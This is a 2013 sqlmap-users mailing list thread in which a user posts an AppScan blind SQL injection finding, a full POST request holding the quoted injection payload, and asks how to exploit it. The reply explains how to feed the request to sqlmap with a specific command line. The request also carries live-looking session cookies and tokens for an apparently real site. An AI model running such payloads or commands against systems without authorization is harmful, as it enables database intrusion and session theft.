Hi.
First thing that you have to be aware that web scanners like AppScan tend
to give false positives here and there.
You can check your sample by removing the "injection part" from the request
itself.
Put this into the request.txt file:
POST /xxx/space.php?appname=feed&mod=home&act=ta HTTP/1.1
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Accept: text/html, */*; q=0.01
X-Requested-With: XMLHttpRequest
Cookie: CmProvid=js;
WT_FPC=id=2f4d851c821d27374a01382214200665:lv=1382216859228:ss=1382214200665;
CmProvid=js;
WT_FPC=id=2f4d851c821d27374a01382214200665:lv=1382216859228:ss=1382214200665;
fpyUjfj0NP=MDAwM2IyYTg2ZjAwMDAwMDAwMjEwLVVsPSExMzgyMjQ1NjM0;
iA2Ks3ygK8=FG85q78Y1WGD; PHPSESSID=j60jb48nmubdirfbcmjdfib6o0;
JSESSIONID=ZcHJSv0Gh2xLyfTrhMHV8bDMjTkLHgPtkyvYmg2n3LPkHpPL09zT!-747763825;
mzone_loginuid=11388868; cmjsSSOCookie=
ec9e1d93a3444957a19aa02ef712a...@js.ac.10086.cn; cmtokenid=
ec9e1d93a3444957a19aa02ef712a...@js.ac.10086.cn; CmWebtokenid=13401541844,js
Accept-Language: en-US
Referer: http://www.xxx.com/xxx/space.php?do=hot
Host: www.xxx.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64;
Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR
3.0.30729; Media Center PC 6.0; Tablet PC 2.0)
Content-Length: 78
return_ajax=1&act=add_attention&targetid=10086
Run in sqlmap by issuing: python sqlmap.py -r request.txt -p return_ajax
Kind regards,
Miroslav Stampar
On Mon, Oct 21, 2013 at 5:54 PM, is2reg <is2...@163.com> wrote:
> **
> **
> method is post, but url have parameter
> following is data:
> **********************
> POST /xxx/space.php?appname=feed&mod=home&act=ta HTTP/1.1
> Content-Type: application/x-www-form-urlencoded; charset=utf-8
> Accept: text/html, */*; q=0.01
> X-Requested-With: XMLHttpRequest
> Cookie: CmProvid=js;
> WT_FPC=id=2f4d851c821d27374a01382214200665:lv=1382216859228:ss=1382214200665;
> CmProvid=js;
> WT_FPC=id=2f4d851c821d27374a01382214200665:lv=1382216859228:ss=1382214200665;
> fpyUjfj0NP=MDAwM2IyYTg2ZjAwMDAwMDAwMjEwLVVsPSExMzgyMjQ1NjM0;
> iA2Ks3ygK8=FG85q78Y1WGD; PHPSESSID=j60jb48nmubdirfbcmjdfib6o0;
> JSESSIONID=ZcHJSv0Gh2xLyfTrhMHV8bDMjTkLHgPtkyvYmg2n3LPkHpPL09zT!-747763825;
> mzone_loginuid=11388868;
> cmjsSSOCookie=ec9e1d93a3444957a19aa02ef712a...@js.ac.10086.cn;
> cmtokenid=ec9e1d93a3444957a19aa02ef712a...@js.ac.10086.cn;
> CmWebtokenid=13401541844,js
> Accept-Language: en-US
> Referer: http://www.xxx.com/xxx/space.php?do=hot
> Host: www.xxx.com
> User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64;
> Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR
> 3.0.30729; Media Center PC 6.0; Tablet PC 2.0)
> Content-Length: 78
>
>
> return_ajax=1%27+and+%27f%27%3D%27f%27%29+--+&act=add_attention&targetid=10086
>
> *********************
>
> the result of appscan is blind-sql-inject, how can I inject this url with
> sqlmap?
> thanks.
>
> 2013-10-21
> ------------------------------
> is2reg
> **
>
>
> ------------------------------------------------------------------------------
> October Webinars: Code for Performance
> Free Intel webinars can help you accelerate application performance.
> Explore tips for MPI, OpenMP, advanced profiling, and more. Get the most
> from
> the latest Intel processors and coprocessors. See abstracts and register >
> http://pubads.g.doubleclick.net/gampad/clk?id=60135031&iu=/4140/ostg.clktrk
> _______________________________________________
> sqlmap-users mailing list
> sqlmap-users@lists.sourceforge.net
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>
--
Miroslav Stampar
http://about.me/stamparm
------------------------------------------------------------------------------
October Webinars: Code for Performance
Free Intel webinars can help you accelerate application performance.
Explore tips for MPI, OpenMP, advanced profiling, and more. Get the most from
the latest Intel processors and coprocessors. See abstracts and register >
http://pubads.g.doubleclick.net/gampad/clk?id=60135991&iu=/4140/ostg.clktrk
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
